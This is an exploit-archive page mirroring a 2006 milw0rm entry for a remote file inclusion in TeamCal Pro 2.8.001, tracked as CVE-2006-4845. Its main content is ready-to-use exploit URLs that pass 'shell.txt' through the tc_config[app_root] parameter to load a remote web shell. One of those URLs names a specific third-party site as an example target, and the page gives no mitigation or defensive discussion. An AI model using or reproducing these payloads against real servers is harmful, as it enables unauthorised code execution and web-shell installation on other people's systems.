[] NeoSense
E X P L O I T S
title author type platform port cve id

TeamCal Pro 2.8.001 - 'app_root' Remote File Inclusion

Author: PSYCH@
type: webapps
platform: php
port: 
date_added: 2006-09-13 
date_updated:  
verified: 1 
codes: OSVDB-28779;CVE-2006-4845 
tags: 
aliases:  
screenshot_url:  
application_url: 
#########################################################################
#Author:PSYCH@  psych0path@hackermail.com
#
#
#########################################################################
#TeamCal Pro 2.8.001 (app_root) Remote file inclusion Vulnerabilities
#Demo: www.lewe.com/tcpro/
#
#########################################################################
#Code:
#
#include( $tc_config['app_root']."includes/footer.html.inc.php" );
#
#########################################################################
#Exploit
#
#http://site.com/path/includes/footer.html.inc.php?tc_config[app_root]=shell.txt?
#
#Example:www.teamcounter.com/tcpro/includes/footer.html.inc.php?tc_config[app_root]=shell.txt?
#
#########################################################################
#Thnx:Warhack & mAfiAcarLEs & DarkXBoyZ
#
#
#########################################################################

# milw0rm.com [2006-09-14]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.